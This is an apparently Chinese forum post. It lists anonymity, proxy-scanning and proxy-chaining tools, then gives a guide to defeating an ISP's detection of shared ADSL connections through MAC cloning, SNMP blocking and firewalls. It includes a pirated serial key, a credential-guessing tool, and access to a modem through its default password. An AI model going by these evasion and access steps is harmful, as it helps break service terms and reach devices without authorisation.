Anonymity 4 Proxy V2.80 1080 KB 网上隐形人
收集、测试及登陆公众匿名代理服务器,隐藏真实IP软件。
主页:http://www.inetprivacy.com/

Winnow Anonymous Proxy 4.0 1MB 收集匿名代理服务器,测试挑选速度较快的服务器IP,隐藏真实IP。
主页:http://www.winnowsoft.com/

SurfSecret V5.12 948KB 用来保护我们网络隐私的工具。
主页:http://www.surfsecret.com/index.html
下载页面(http://soft.winzheng.com/SoftView/SoftView_3262.htm)

Get Anonymous Professional Edition 2.0 6.86MB 主要功能包括:隐私功能;保护功能(分析引擎、增加IP地址、隐藏IP地址、防御操作系统、目录控制、JavaScript过滤和在线隐私控制);过滤功能。
主页:http://www.privatenavigator.com/getanonymous/professional.asp

Steganos Internet Anonym Pro 6.0.8 10MB 网络隐藏专家
主页下载 (http://steganos.com/software/sia6int.exe)
中文版下载(http://www.ttdown.com/SoftView/SoftView_19257.html)

2.安全加密

Anonymizer Private Surfing 2.1 通过Anonymizer的专用服务器对通信进行SSL加密。
主页:http://www.anonymizer.com

Freedom WebSecure 也是通过海外服务器对通信内容加密。
主页:[urlhttp://www.freedom.net/products/websecure/roaming/index.html[/url]
http://websecure.freedom.net/download.php

Primedius WebTunnel v4.02.946.00 906 KB
可以让你隐密又安全地在网际网络上畅游,就连你的ISP或网络管理员也无法知道你逛了哪些网站。而SOCKS兼容模块更能让你使用像Yahoo、MSN等的实时讯息软件。他能够连cookie都透过加密信道传输。
主页:http://www.primedius.com/PrimediusUpdates.htm
下载页面(http://www.ttdown.com/SoftView/SoftView_9821.html)

Garden 3.1 269KB 代理模式版本,特殊加密。
主页:http://gardennetworks.com
主页下载(http://24.87.31.223/download/Garden31.zip)

SoftEther v1.0 1.97MB 虚拟网软件,原理上类似VPN 软件,分服务器和客户端,多种加密方式选择。
主页:http://www.softether.com/jp

3.搜寻验证

Proxy Checker v7.0 344KB
校验出的etitle代理(全匿名代理),支持ssl网页,并且用TUNNEL FINDER校验,支持connect命令,匿名性较高。
主页下载(http://www.proxychecker.org/proxychecker.zip)
Name: www.ttdown.com s/n: HLPC6-9180B6B8A88EAA

代理之王 1.2.0 300KB 搜索验证http、socks代理。
主页下载:http://www.proxyking.com/zhCN/downloads.html
http://www.proxyking.com/download/proxyking_zh_CN.zip

Tunnel finder 430KB 是一款特殊的代理服务器搜索软件,可以从代理服务器列表中找出支持CONNECT命令的代理。
参考下载(http://wvw.ttian.net/download/show.php?id=496)

Remote Proxy Checker 可校验http和socks代理。
主页下载(http://www.freeproxy.ru/download/remote_checker.exe)

SOCKS Proxy Checker 校验socks代理。
主页:http://www.freeproxy.ru/download

SocksCat 179KB 素食猫,专门搜寻socks代理。
下载原在http://leonyxl.yeah.net;http://www.starkun.com

Anonymous Proxy Verifier v2.05 207 KB 匿名代理检测
检测某个代理服务器是真正的匿名服务器,还是普通的对公众开放的服务器!
下载页面(http://www.ttdown.com/SoftView/SoftView_8323.html)

AiS AliveProxy v4.5.4.439 2.5MB 一个代理服务器检测软件,它能够从指定的网站或文件(TXT、HTML)中提取代理服务器,然后对其类型(透明或匿名)、连接速度和超时进行检测。
下载页面 (http://www.ttdown.com/SoftView/SoftView_15030.html)

Proxy Grabber v1.1 359.7KB 非常快速的Socks代理扫描器,可以同时检查无限量的地址。
主页:http://zlg.netfirms.com

Proxy Grabber v1.0 英文注册版228K
参考下载(http://www.crsky.net/soft/2467.htm)

proxyjudge 代理分析工具
主页:http://proxyjudge.org/prxjdg.cgi

Proxyrama version 1.6 167 kb 小巧、易用。
is a tool for finding and testing proxy servers. it will test them for anonymity, speed, if it‘s a gateway proxy, ‘connect‘ support (=chainability), socks 4/5 support and geographical location. furthermore, it can be used as a local proxy server that redirects your traffic through a arbitrarily long chain of anonymous proxies and let‘s you skip images, multimedia crap, ads, popups etc.
主页:http://gaamoa.deny.de

Socks tester v1.1 240 kb
Program tests public socks server on access time and bandwidth
主页:http://www.astra-soft.com

Socks scanner v1.2 220 kb
Program searches public socks server
主页:http://www.astra-soft.com/socksscanner

AATOOLS v5.56 build 1070 (trial version) AATools v.5.56 is released
下载页面:http://www.glocksoft.com/download.htm

APL v1.3 (Automated Proxy Leecher):
http://sentinel.deny.de/apl.htm

Proxynator v2.0 从google上吸附代理的工具
下载(http://www.freewebs.com/yahoohell/Proxynator.zip)

SurfAnonymous v1.0.1.0 705 kb 可以搜索、分析、捕捉、管理代理服务器地址的软件。
主页:http://www.sa6ry.com/surfanonymous
下载页面(http://www.ttdown.com/SoftView/SoftView_18723.html)

Proxy Analyzer 代理服务器分析
主页:http://www.glocksoft.com/proxy_analyzer.htm

AccessDiver V4.120 1946 KB 检测网站安全漏洞的工具,网络安全测试软件,能通过不同代理服务器多线程检测登录帐号、密码,用来收集代理也是不错的。
主页:http://www.accessdiver.com
汉化版下载(http://soft.winzheng.com/SoftView/SoftView_10141.htm)

代理服务器查看程序 v1.0 简体中文20 KB 一个可以让你查看网络上哪些计算机打开了你需要检查的端口,以及一台计算机上有多少个已经打开的端口!

4.链接转换

TCP2HTTP 1.0 290K 具有sock2http, httpport,scokcap32的所有功能,并且还具有它们没有的功能,如让用户通过TCPMAP,可以使用FTP,pop3,sock5, telnet等的程序通过firewall;http proxy的权限检查;代理链;http no cache等。所用代理服务器应有穿越功能。
参考下载(http://www.chinesehack.org/down/show.asp?id=1122)

Proxy Tunnel 1.1 1.37MB 让你绕过SOCKS、代理服务器和防火墙,可以使用FTP服务器和文件下载管理器的工具。完全支持SMTP/ IMAP/ POP协议。
主页:http://www.vellumsoft.com/
参考下载(http://newhua.ruyi.com/soft/23389.htm)

SocksChain V3.9.143 可以通过多个SOCKS和HTTP代理组成代理链,从而实现隐藏IP的目的。
主页http://www.ufasoft.com http://www.sockschain.com/socks/

Proxy Chain v1.0 990 KB 一个可以完全定制的代理服务上网的工具,可以帮助你将几个HTTP和Socks4代理串起来使用。
参考下载(http://www.kingti.com/soft/6890.htm)

AvalancheCap v1.1 1014KB 透过socks 代理服务器连接网络,让不支持socks代理服务器的程序也可以通过socks 代理服务器上网。
http://avalanche-software.com/

multiproxy 1.2 155KB 自动测试和自动调度多代理(http)。
主页:http://www.multiproxy.org

代理之狐2.0 232 K 快速验证和调度http代理。
下载页面(http://www.jszzb.com/Soft_Show.asp?SoftID=4)

ProxyCap v2.0 316 KB 能让你所有或指定的应用程序通过HTTP、SOCKS4、SOCKS5代理服务器。 汉化版本已****
主页:http://proxylabs.netwu.com/#

AllegroSurf Network v6.0.0.1 2.83 MB 一个HTTP、DNS、FTP、NNTP、POP3、SMTP、SOCKS4、SOCKS4a、SOCKS5 代理服务器软件,支持过滤、预先抓取功能。
http://www.allegrosurf.com/
下载页面 (http://www.ttdown.com/SoftView/SoftView_8059.html)

5.网页过滤

Proxymitron v4.5 1.3MB 具有调度使用http代理型的过滤器,过滤的效果取决于你的filter是否写得周全完善。
主页下载:http://www.proxomitron.info/files/index.shtml

Ad Muncher 157kb 小巧精致,内置1570个过滤器项目,也内置了一个proxy检验程序,可以把它当作一个代理调度程序来用。
主页:http://www.admuncher.com/download.shtml
主页下载(http://www.admuncher.com/AM-Install.exe)

Naviscope V8.70 613 KB 它通过软件自身来起到一个代理的作用,滤掉广告图,阻绝Cookies、Javascript等。
汉化补丁(http://www.sky66.com/soft/3459.htm)
下载 (http://www.naviscope.com/nscope.exe)

ADSL共享上网有两种方式,一种是代理,一种是地址翻译(NAT),大家常说的路由方式其实就是NAT方式,其实路由和NAT的原理还是有区别的, 这里不作讨论,现在的ADSL猫一般都有NAT的功能,用它本身的功能实现共享上网是比经济方便,本文主要讨论这种方式。

  要想阻断一台以上的计算机上网必须能发现共享后边的机器是否多于一台,NAT的工作原理如图一所示,经过NAT转换后访问外网的内网的计算机 的地址都变成了192.168.0.1而且MAC地址也转换成了ADSL的MAC地址,也就是说,从原理上讲,直接在ADSL出口抓经过NAT转换的包是 不能发现到底有几台机器在上网。那是如何发现的呢?经过研究发现它是采用多种方法探测用户是否用共享方式上网,从而进行限制,下面分别进行破解:

  一.检查同一IP地址的数据包中是否有不同的MAC地址,如果是则判定用户共享上网。破解的办法是把每台机的MAC地址改为一样.修改的方法如下:

  首先要获取本机的MAC:MAC地址是固化在网卡上串行EEPROM中的物理地址,通常有48位长。以太网交换机根据某条信息包头中的MAC源地址和MAC目的地址实现包的交换和传递。

  ⑴在Windows 98/Me中,依次单击“开始”→“运行” →输入“winipcfg”→回车。

  ⑵在Windows 2000/XP中,依次单击“开始”→“运行”→输入“CMD”→回车→输入“ipconfig /all”→回车。

  或者右键本地连接图标、选择状态然后点击支持选项卡,这里“详细信息”中包含有MAC和其它重要网络参数。

  1、如果你的网卡驱动有直接提供克隆MAC地址功能,如RealTek公司出的RTL8139芯片,那恭喜你了,点击“开始→设置→控制面 板”,双击“网络和拨号连接”,右键点击需要修改MAC地址的网卡图标,并选择“属性”。在“常规”选项卡中,点击“配置”按钮,点击“高级”选项卡。在 “属性”区,你应该可以看到一个称作 “Network Address”或“Locally Administered Address”的项目,点击它,在右侧“值”的下方,输入你要指定的MAC地址值。要连续输入12个数字或字母,不要在其间输入“-”。重新启动一次系 统后设置就会生效了(Windows 98和Windows 2000/XP用户操作略有区别,请参照系统说明操作)

  2、如果你的网卡驱动没有提供克隆MAC地址功能,那下面分别提供一些方法,希望能找到一个适合你的

  WIN98下:

 a.在"网上邻居"图标上点右键,选择"属性",出来一个"网络"对话框,在"配置"框中,双击你要修改的网卡,出来一个网卡 属性对话框。在"高级"选项中,也是点击"属性"标识下的"Network Address"项,在右边的两个单选项中选择上面一个,再在框中输入你要修改的网卡MAC地址,点"确定"后,系统会提示你重新启动。重新启动 后,你的网卡地址就告修改成功!!

 b.点击“开始→运行”,键入“winipcfg”,选择你要修改的网卡,并记录MAC地址值。点击“开始→运行”,输入“regedit”运 行注册表编辑器(在修改注册表前,一定要先备份注册表),依据注册表树状结构,依次找到“HKEY_LOCAL_MACHINE\System\ CurrentControlSet\Services\Class\Net”,你会看到类似“0000”、“0001”、“0002”等样子的子 键。从“0000”子键开始点击,依次查找子键下的“DriverDesc” 键的内容,直到找到与我们查找的目标完全相同的网卡注册表信息为止。

  当找到正确的网卡后,点击下拉式菜单“编辑→新建→字符串”,串的名称为“networkaddress”,在新建的 “networkaddress”串名称上双击鼠标,就可以输入数值了。输入你指定的新的MAC地址值。新的MAC地址应该是一个12位的数字或字母,其 间没有“-”,类似“00C095ECB761”的样子。

  有两种方法激活新的MAC地址:

  如果你使用的是普通内置网卡,就必须重新启动计算机来使修改生效。

  如果你使用的是PCMCIA卡,你可以按照下面的步骤操作而不必重新启动操作系统:运行winipcfg,选择并释放DHCP设置,关闭 winipcfg。打开控制面板或系统托盘“PC Card (PCMCIA)”,停止并弹出PCMCIA网卡。重新插入PCMCIA网卡,打开winipcfg,选择并刷新DHCP设置,运行winipcfg,确 定修改的MAC地址已生效

WIN2000下:

  a.在桌面上网上邻居图标上点右键,选"属性",在出来的"网络和拨号连接"窗口中一般有两个图标,一个是"新建连接"图标,一 个是"我的连接"图标。如果你的机器上有两个网卡的话,那就有三个图标了。如果你只有一个网卡,那就在"我的连接"图标上点右键,选"属性 ",会出来一个"我的连接 属性"的窗口。在图口上部有一个"连接时使用:"的标识,下面就是你机器上的网卡型号了。在下面有一个"配置"按钮,点击该按钮后就进入了网卡 的属性对话框了,这个对话框中有五个属性页,点击第二项"高级"页,在"属性"标识下有两项:一个是"Link Speed/Duplex Mode",这是设置网卡工作速率的,我们需要改的是下面一个"Network Address",点击该项,在对话框右边的"值"标识下有两个单选项,默认得是"不存在" ,我们只要选中上面一个单选项,然后在右边的框中输入你想改的网卡MAC地址,点"确定",等待一会儿,网卡地址就改好了,你甚至不用停用网卡!
你也可以在"设置管理器"中,打开网卡的属性页来修改,效果一样。
b.1.在“HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class 4D36E972-E325-11CE-BFC1-08002BE10318\0000、0001、0002”等主键下, 因为你有可能安装了不止一块网卡,所以在这个主键下馍能会有多个类似于“0000、0001”的主键,这时候你可以查找DriverDesc内容为你要修 改的网卡的描述相吻合的主键,如“0000”。
  
  2.在上面提到的主键下,添一个字符串,名字为“NetworkAddress”,把它的值设为你要的MAC地址,要连续写 如“001010101010”。
  
  3.然后到主键下“NDI\params”中添加一项“NetworkAddress”的主键值,在该主键下添加名为“default”的字符串,值写要设的MAC地址,要连续写,如“001010101010”。
  
  【注】实际上这只是设置在后面提到的高级属性中的“初始值”,实际使用的MAC地址还是取决于在第2点中提到的“NetworkAddress”参数,而且一旦设置后,以后高级属性中值就是“NetworkAddress”给出的值而非“default”给出的了。
  
  4.在“NetworkAddress”的主键下继续添加名为“ParamDesc”的字符串,其作用为指定 “NetworkAddress”主键的描述,其值可为“MAC Address”(也可以随意设置,这只是个描述,无关紧要,这个值将会在你以后直接修改MAC地址的时候作为描述出现),这样重新启动一次以后打开网络 邻居的属性,双击相应网卡项会发现有一个高级设置,其下存在MAC Address (就是你在前面设置的ParamDesc,如图(^29041103a^)1)的选项,这就是你在第二步里在注册表中加的新项 “NetworkAddress”,以后只要在此修改MAC地址就可以了。
  
  5.关闭注册表编辑器,重新启动,你的网卡地址已经改好了。打开网络邻居的属性,双击相应网卡项会发现有一个MAC Address的高级设置项。用于直接修改MAC地址,而且不需要重新启动就可以实现MAC的随时更改。

WinXP下

  大部分的网卡都可以通过在控制面板中修改网卡属性来更改其MAC地址。在“设备管理器中”,右键点击需要修改MAC地址的网卡图标,并选择 “属性/高级”选项卡。在“属性”区,就可以看到一个称作“Network Address”或其他相类似名字的的项目,点击它,在右侧“值”的下方,输入要指定的MAC地址值。要连续输入12个十六进制数字或字母,不要在其间输 入“-”。

  另外有几个可以修改MAC的软件都可以在XP/W2K下运行,大家可以去网上搜下,所以这里就不详细介绍了

linux下

  需要用 #ifconfig eth0 down 先把网卡禁用 ,再用ifconfig eth0 hw ether 1234567890ab ,这样就可以改成功了
要想永久改,就在/etc/rc.d/rc.local里加上这三句(也可在/etc/init.d/network里加下面三行)
ifconfig eth0 down
ifconfig eth0 hw ether 1234567890ab
ifconfig eth0 up

  如果你想把网卡的MAC地址恢复原样,只要再次把"Network Address"项右边的单选项选择为下面一个"没有显示"再重新启动即可。在WIN2000下面是选择"不存在",当然也不用重新启动了。

  二、通过SNMP(简单网络管理协议)来发现多机共享上网。有些路由器和ADSL猫内置SNMP服务,通过扫描软件(ipscan、 superscan……)扫描一下,发现开着161端口,161是SNMP(简单网络管理协议)的服务端口,难道是通过SNMP协议发现的主机数 量,用xscan对猫进行了漏洞扫描,果然有默认密码,登陆到猫的管理界面但是找不到关闭SNMP服务的地方,看来是留的后门,由此基本可断定是通过 SNMP协议发现的主机数。为了进一步证实,用SNMP的一个管理软件ActiveSNMP查看ADSL猫的连接情况,如图二所示,可以清楚地看出通过 SNMP协议可以发现同时上网的主机数量。

解决办法:

  1.如果该猫可以关闭SNMP协议,那就把SNMP用的161端口禁止就行了.使用路由器或打开ADSL猫的路由模式共享上网的朋友可以进入 管理界面有关闭SNMP选项的关掉它。如果猫的管理界面无关闭SNMP选项的只好买一个没有SNMP服务的路由器,例如TP-LINK TL-R400,放到adsl moden和hub中间,如下图.在该路由器中再做一个NAT服务,这样进到ADSL猫中的就是一个地址,这样就解决了共享上网。 注意在路由器中要关闭SNMP协议。

  2.修改配置文件,可以将配置转换成一个文件,用二进制编辑工具修改默认密码,然后再加载到猫中,这只是一种思路,没有试过

  三、监测并发的端口数,并发端口多于设定数判定为共享。

  这是一个令人哭笑不得的设定,“网络尖兵”不停扫描用户打开的端口数,多于设定值的就判断是共享,有时连按几次F5键它是认为是共享,连单用 户上网也受到了影响,这个就没法破解了(除非你把网络尖兵黑了),俺这里的解决办法是装成无辜的用户到ISP的客服电话大骂,并声明搞不好就换ISP,一 会儿网络就正常了。

  四、“网络尖兵”还使用了未知的方法从共享的计算机中探测到共享的信息,目前解决的办法是所有共享的客户机均要安装防火墙,把安全的级别设为最高,因条件有限,只试用了几种防火墙,发觉金山网镖V(http://www.gz-pet.com/Soft_Show.asp?SoftID=10)有用,把IP配置规则里面所有的允许别人访问本机规则统统不要,允许PING本机不要,防止ICMP,IGMP攻击也要勾选。如果是WINXP,要打开网卡的网络防火墙。

  采取以上破解的办法后,在自己的局域网不能看到本机,而且WINXP打开网卡的网络防火墙后,在QQ不能传送文件,网速有所减慢,但总算又可以共享了,如果有好的办法,也请大家告知。

  总的来说,“网络尖兵”还是一个不成熟的产品,主要是他对单用户上网也产生影响,浏览网页经常要刷新几次,有的网页比较复杂,要调用几个服务器文件时它也当你是共享,造成网页部分不能显示。并且由于“网络尖兵”不停扫描用户端口占用带宽,导致网速变慢.